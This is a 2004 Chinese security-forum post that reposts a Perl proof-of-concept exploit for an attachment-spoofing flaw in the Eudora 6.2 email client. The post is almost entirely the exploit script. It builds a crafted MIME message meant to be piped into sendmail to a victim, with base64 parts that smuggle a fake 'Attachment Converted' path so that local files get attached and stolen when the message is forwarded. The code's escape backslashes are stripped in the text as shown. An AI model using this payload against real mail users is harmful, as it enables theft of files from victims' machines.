‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Eudora 6.2 Remote Attachment Spoofing Proof of Concept

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6819 
精华
834 
积分
36070 
阅读权限
255 
性别
男 
来自
中国 
在线时间
586 小时 
注册时间
2004-6-25 
最后登录
2008-9-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-11-16 07:12  只看该作者

Eudora 6.2 Remote Attachment Spoofing Proof of Concept

信息来源:www.hk20.com
复制内容到剪贴板
代码:
#!/usr/bin/perl --

use MIME::Base64;

print "From: men";
print "To: youn";
print "Subject: Eudora 6.2 on Windows spoofn";
print "MIME-Version: 1.0n";
print "Content-Type: multipart/mixed; boundary="zzz"n";
print "X-Use: Pipe the output of this script into: sendmail -i victimnn";

print "--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitnn";
print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to). Get a warning when stealing arbitrary
files, but no warning when stealing 'attach\existing' attachments.n";

print "n--zzzn";
print "Content-Type: text/plain; name="b1.txt"n";
print "Content-Transfer-Encoding: base64n";
print "Content-Disposition: inline; filename="b1.txt"nn";
$z = "Within base64 encoded, use missing linebreak. Part 1 ...r
AttachmenXX";
print encode_base64($z);

print "n--zzzn";
print "Content-Type: text/plain; name="b2.txt"n";
print "Content-Transfer-Encoding: base64n";
print "Content-Disposition: inline; filename="b2.txt"nn";
$z = "t Converted: "c:\winnt\system32\calc.exe"r
... part 2r
BTW, the above shows a parsing bug: missing two characters.r
rn";
print encode_base64($z);

print "n--zzz--n";

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题